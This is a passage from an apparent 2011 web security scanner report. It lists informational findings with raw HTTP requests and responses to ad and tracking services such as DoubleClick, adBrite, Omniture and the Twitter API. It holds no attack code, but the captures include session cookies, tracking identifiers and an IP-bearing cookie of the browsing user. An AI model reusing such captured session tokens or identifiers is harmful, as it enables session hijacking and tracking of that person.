var defaultCtVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BKS8xsfPHTdDJFsmV6Aarm5ivBAAAAAAQASAAOABQu-inzvj_____AVjRkYYUYMmGhYmIpIQQggEJY2EtZ29vZ2xlsgELd3d3Lm5tZS5jb23IAQnaASxodHRwOi8vd3d3Lm5tZS5jb20vbmV3cy9zdWZqYW4tc3RldmVucy81NjUyN8ACAqgDAdgEgK3iBOAEApoFFwjRgBQQ1_GqHhjgweBwINGRhhQo7vo82gUCCAA&num=0&sig=AGiWqtwvP3w2Vn-spxO7hgEDexBlPgen5A&client=&adurl=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS%3D2iU9W.LI1r/K%3DADS_T200/SZ%3D300X250A/V%3D2.3S//REDIRURL%3Dhttp://www.t-mobile.com/shop/phones/default.aspx%3Fmanufacturer%3D9c43c518-8abb-453d-a0cd-8b7e912ff3fe");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BKS8xsfPHTdDJFsmV6Aa
...[SNIP]...

Request 2

GET /adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 09 May 2011 14:01:37 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 6709

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated
...[SNIP]...
"http://s1.2mdn.net/998766/1052_300x250_Promo_FreeGalaxyS_Android_Static.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BOpGUwfPHTdqlLM2k6Qah1rWuBAAAAAAQASAAOABQu-inzvj_____AVjRkYYUYMmGhYmIpIQQggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUXCNGAFBDX8aoeGODB4HAg0ZGGFCju-jzaBQIIAA&num=0&sig=AGiWqtwGhuEpVeNOXpOj1NAWZsJs31J4NQ&client=&adurl=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS%3D2iU9W.LI1r/K%3DADS_T200/SZ%3D300X250A/V%3D2.3S//REDIRURL%3Dhttp://www.t-mobile.com/shop/phones/default.aspx%3Fmanufacturer%3D9c43c518-8abb-453d-a0cd-8b7e912ff3fe");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BOpGUwfPHTdqlLM2k6Qah1rWuBAAAAAAQASAAOABQu-inzvj_____AVjRkYYUYMmGhYmIpIQQggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUXCNGAFBDX8aoeGODB4HAg0ZGGFCju-jzaBQIIAA&num=0&sig=AGiWqtwGhuEpVeNOXpOj1NAWZsJs31J4NQ&client=&adurl=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS%3D2iU9W.LI1r/K%3DADS_T200/SZ%3D300X250A/V%3D2.3S//REDIRURL%3Dhttp://www.t-mobile.com/shop/phones/default.aspx%3Fmanufacturer%3D9c43c518-8abb-453d-a0cd-8b7e912ff3fe");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BOpGUwfPHTdqlLM2k6Qah1rWuBAAAAAAQASAAOABQu-inzvj_____AVjRkYYUYMmGhYmIpIQQggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUXCNGAFBDX8aoeGODB4HAg0ZGGFCju-jzaBQIIAA&num=0&sig=AGiWqtwGhuEpVeNO
...[SNIP]...

12.2. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Request 1

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb2=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; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 10-May-2011 14:00:11 GMT
Set-Cookie: rb2=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; path=/; domain=.adbrite.com; expires=Sun, 07-Aug-2011 14:00:11 GMT
Set-Cookie: ut="1%3AXZDJloMgEEX%2FhbULhiie%2FI0EokQGGRKPCfn3Bjr2ib293Ee9qhd4YHB%2BgVlsq%2FU8gDPwq9L3hJwOlCaUYFNAKGChvILLNPWjg8MjQzVGnXBiTZDSkGIxWGMJ3WZYXNPOuI3j75PILuaNc%2BS5ZtITrzJB7e5d7cHbqT7QoIRSmbC42kRTx8ifaP7FVSe37lQoh3dV24eZxKVozqBa9KRtLuq1NXW44%2F1ny%2FqlbI%2BzcfA5tmxXY9KQEIrP%2FR4CF3OC41e8o5fvOGgAG4wRXtZTg%2Ff7Bw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 06-May-2021 14:00:11 GMT
Set-Cookie: vsd=0@1@4dc7f36b@cdn.turn.com; path=/; domain=.adbrite.com; expires=Wed, 11-May-2011 14:00:11 GMT
Set-Cookie: fq=; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 14:00:11 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; 
fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:40 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 10-May-2011 14:00:40 GMT
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY-biQzw4iEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; path=/; domain=.adbrite.com; expires=Sun, 07-Aug-2011 14:00:40 GMT
Set-Cookie: ut="1%3AXZDJloMgEEX%2FhbULhiie%2FI0EokQGGRKPCfn3Bjr2ib293Ee9qhd4YHB%2BgVlsq%2FU8gDPwq9L3hJwOlCaUYFNAKGChvILLNPWjg8MjQzVGnXBiTZDSkGIxWGMJ3WZYXNPOuI3j75PILuaNc%2BS5ZtITrzJB7e5d7cHbqT7QoIRSmbC42kRTx8ifaP7FVSe37lQoh3dV24eZxKVozqBa9KRtLuq1NXW44%2F1ny%2FqlbI%2BzcfA5tmxXY9KQEIrP%2FR4CF3OC41e8o5fvOGgAG4wRXtZTg%2Ff7Bw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 06-May-2021 14:00:40 GMT
Set-Cookie: fq=; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 14:00:40 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

12.3. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

Summary

Severity:   Information
Confidence:   Firm
Host:   http://alvenda.122.2o7.net
Path:   /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

Request 1

GET /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1 HTTP/1.1
Host: alvenda.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response 1

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:06:50 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tycpx7Bqtax7Dzxxfzx7Bgpx60apgf=[CS]v4|0-0|4DC7F4FA[CE]; Expires=Sat, 7 May 2016 14:06:50 GMT; Domain=.2o7.net; Path=/
Location: http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&pccr=true&&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:06:50 GMT
Last-Modified: Tue, 10 May 2011 14:06:50 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www290
Content-Length: 0
Content-Type: text/plain

Request 2

GET /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1 HTTP/1.1
Host: alvenda.122.2o7.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response 2

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:09:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tycpx7Bqtax7Dzxxfzx7Bgpx60apgf=[CS]v4|0-0|4DC7F595[CE]; Expires=Sat, 7 May 2016 14:09:25 GMT; Domain=.2o7.net; Path=/
Location: http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&pccr=true&g=none&&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:09:25 GMT
Last-Modified: Tue, 10 May 2011 14:09:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www253
Content-Length: 0
Content-Type: text/plain


12.4. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Request 1

GET /1/statuses/user_timeline.json?screen_name=OSentinelBiz&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=5&clientsource=TWITTERINC_WIDGET&1304949572397=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304949575-25240-22084
X-RateLimit-Limit: 150
ETag: "98aaceed48e4ccd42b79709e9f443154"-gzip
Last-Modified: Mon, 09 May 2011 13:59:35 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02358
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 4477c3eabd09e879d2fca4f211d0ecb1dcbd8643
X-RateLimit-Reset: 1304953175
Set-Cookie: original_referer=ZLhHHTiegr8aia0pL5vMr3kk%2BX%2BcqR3rsxppA%2FovyVCexTmcz%2FMvOkAXJR%2BHAK6zSrw43nllCDgN7RfPnnkGWrD0tlGHXcKgXzEfbM%2FnZyY2aQU3pk7AwQ%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCHpODtUvAToHaWQiJTRlZDg4ODBjZGUyYTBl%250ANDIwNTIwZGMzMTllNmI5N2M0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--f79c0141fe922e790699a68ff50019e9d67d29da; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 8808

TWTR.Widget.receiveCallback_1([{"text":"How local stations will cover #CaseyAnthony trial. http:\/\/bit.ly\/m7l2jo #media","coordinates":null,"truncated":false,"id_str":"67586194652930048","source":"web","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Mon May 09 13:46:19 +0000 2011","contributors":null,"user":{"default_profile_image":false,"profile_use_background_image":true,"default_profile":false,"statuses_count":388,"following":null,"profile_background_color":"EDECE9","description":"Central Florida's leading source for business, technology and consumer news. Be the first to know when business news happens -- text OSBIZ to 43886. ","screen_name":"OSentinelBiz","profile_background_image_url":"http:\/\/a2.twimg.com\/profile_background_images\/191413454\/x562a42969f39cc560ae5a79a392dc5c.jpg","follow_request_sent":null,"verified":false,"friends_count":850,"id_str":"236849001","profile_text_color":"634047","location":"Orlando, 